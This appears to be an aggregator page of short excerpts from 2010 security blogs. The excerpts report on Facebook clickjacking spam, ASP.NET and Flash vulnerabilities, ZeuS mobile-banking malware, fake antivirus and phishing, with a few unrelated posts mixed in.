Information Filled Under ‘Web Service Security’ Category
Say you’re a social media spammer that drives traffic to CPAlead.com surveys… What do you do when English speakers are increasing desensitized towards Facebook spam? Language localization! We’re currently seeing a run of Facebook spam that uses the following subject: “Voi paska, katso miten kävi kun isä näki tyttärensä webcam-esityksen” It’s a Finnish translation of the popular English spam subject: “OMG, dad catches daughter on webcam” The spam links to this Page: After clicking on the confirm button, the user will be asked to click a series of numbered buttons: This is a form of clickjacking that will result in the link being shared to the user’s profile, thus spreading to friends via the News Feed
Go here to read the rest:
Voi Paska, Facebook Spam Localized in Finnish
On September 19th and 20th, over 600 sites, mainly in Malaysia and Indonesia, were temporarily listed by Google as potentially harmful*. The roll call of sites affected include many of Malaysia’s major online media sites, including TheStar, Malaysiakini, Berita Harian and the Malaysian Insider
See the original post:
1 Ad Service Compromised, 1 Country’s Users Annoyed
Online Gossip Magazine Radar Online is reporting that NBA star Shaquille O’Neal is facing a lawsuit accusing him of hacking , destroying evidence and indicating that he attempted to frame an employee by planting child pornography on his computer . According to the lawsuit, O’Neal also threw a personal computer in the lake behind his home. O’Neal (widely known by his nickname ‘Shaq’) is one of the most famous professional basketball players in the world and one of the wealthiest sport stars overall
See the rest here:
Shaq is Wack
Adobe released a security advisory for Flash Player yesterday: “There are reports that this vulnerability is being actively exploited in the wild against Adobe Flash Player on Windows.” Flash Player will be patched the week of September 27, 2010. Flash technology is also embedded in Reader and Acrobat.
Read the original here:
Adobe Advisories
Microsoft has released an out-of-band security bulletin (MS10-070), for the ASP.NET “information disclosure” vulnerability. The short version of the vulnerability is that exploiting it generates unintended error messages containing information that an attacker may be able to use to view or compromise data. According to the bulletin, any applications running on the ASP.net platform are vulnerable.
Go here to see the original:
Patch for ASP.net Information Disclosure Vulnerability Released
There’s an interesting Windows+mobile case today involving a ZeuS variant that steals mTANs , using a Symbian (.sis) or Blackberry (.jad) component. An mTAN is a mobile transaction authentication number, sent via SMS, and is used by some banks as a form of single use one-time password to authorize an online financial transaction.
Read more:
ZeuS Variants Targeting Mobile Banking
Like it or not, Twitter is important . It is not only used for chit-chat, but it has turned out to be the fastest way to get eye-witness reports from people who are on location whenever something happens
Read the original:
Get the Hackers on Your Side
“I’m just freelancing while I’m looking for a job.” “I’m just freelancing while I build up my company.” “I’m just freelancing until something better comes along.” It’s easy to come to the conclusion that any ambitious freelancer is looking to get out of the freelancing game.
See more here:
What’s the Career Path for Ambitious Freelancers?
The recent publicity and ranting about Twitter’s onMouseOver flaw* got me thinking about our perception of software quality and expectations of risk. Why is there no room for error when Twitter makes a mistake yet we put up with so many bigger – and more personal – issues in our everyday lives? Imagine if every quality issue we experience in our daily lives resulted in the alarm such as the Twitter discovery?
Read more:
Why all the hoopla over the Twitter onMouseOver flaw?
Today, at SophosLabs, we encountered another interesting rogue security software variant, Troj/FakeAV-BTN . When run, Troj/FakeAV-BTN poses as Microsoft Security Essentials Alert and detects only one file as “Unknown Win32/Trojan”. When user wants to remove this fake threat, this malware offers “Scan online” option
See the rest here:
Choose your FakeAV?
An updated build of Acunetix WVS Version 7 has been released. Apart form a number of improvements and bug fixes, this build will also automatically check for the latest OpenX OFC file upload and the ASP.NET padding Oracle vulnerabilities.
See the rest here:
Acunetix WVS Version 7 build 20100921 released
The attackers behind the spammed HTML redirects I blogged about last week have been busy over the last few days. In an ongoing attempt to evade detection they have continually tweaked and changed the manner in which the redirect is being hidden. In this post I will take a quick look at the evolution of these scripts that we are blocking as JS/WndRed-B
Go here to read the rest:
Cat ‘n Mouse with spammed HTML redirects.
Everybody’s talking about the ASP.NET Padding Oracle vulnerability released a few days ago at the ekoparty Security Conference.
Go here to see the original:
How to check if your application is vulnerable to the ASP.NET Padding Oracle Vulnerability
Probably my biggest pet peeve related to application security is the claim by many (typically management) that “We know we’re secure, we just had an audit”. I can’t tell you how many times I’ve seen this situation. Management will require their administrators to go down some random checklist or run a basic vulnerability scan.
See the article here:
Why do so many people buy into “checklist” audits?
By Hans M. Kristensen The next steps in European security should include additional reductions in the number short-range nuclear weapons in Europe, according to a video statement issued by NATO General Secretary Anders Fogh Rasmussen: “We also have to make progress sooner or later in our efforts to reduce the number of short-range nuclear weapons
Read the original post:
Rasmussen: Lay Short-Range Nuclear Weapons Thinking to Rest
This week I have been putting the finishing touches to my presentation for the Virus Bulletin Conference in Vancouver later this month. While doing the research I have collected a large corpus of PDF files; the results of analyzing these files form the bulk of my presentation.
None of us would want to be operated on by an unlicensed surgeon so why should we put trust in software applications written by unlicensed, uncertified programmers? Apple have seemingly taken the high-road by requiring programmers to register as Apple developers (for a small-but-not-negligible fee) before they can deploy their code to a device (even if its just their own)
Go here to read the rest:
License to code
Sophos users over the past few months may have noticed that they haven’t been able to access parts of the Somerset Information Exchange (SiX) due to instances of Mal/Badsrc-C on the site. The problems for the SiX microsite, hosted on somerset.gov.uk, is larger than just malicious SCRIPT tags on pages. The site also has injected Blackhat SEO code on the main site: The insurance area on the site is riddled with injected scripts: Everyday, SophosLabs see thousands of infected websites, including .gov websites from around the world
More here:
Somerset County Council website victim of Blackhat SEO and malware injection
This week we’ve seen more phishing spam targeting the Commonwealth Bank of Australia, an institution that many scammers have aimed at in the past . The emails have a subject of “Update your Commonwealth Bank” and look like this: The text is standard scaremongering. Opening with “Customer ID : 000-5432-654386-PSI” does make the email look more official, and presumably relies on the fact that most customers don’t remember their own personal number
Read this article:
Infected Phish
12 posts left… While doing some research I happened across an old post of mine that I had totally forgotten about. It was an old post about betting on the chances of compromise . Specifically I was asked to give odds against whether I thought Google or ha.ckers.org would survive a penetration test (ultimately leading to disclosure of data)
Go here to see the original:
Odds, Disclosure, Etc…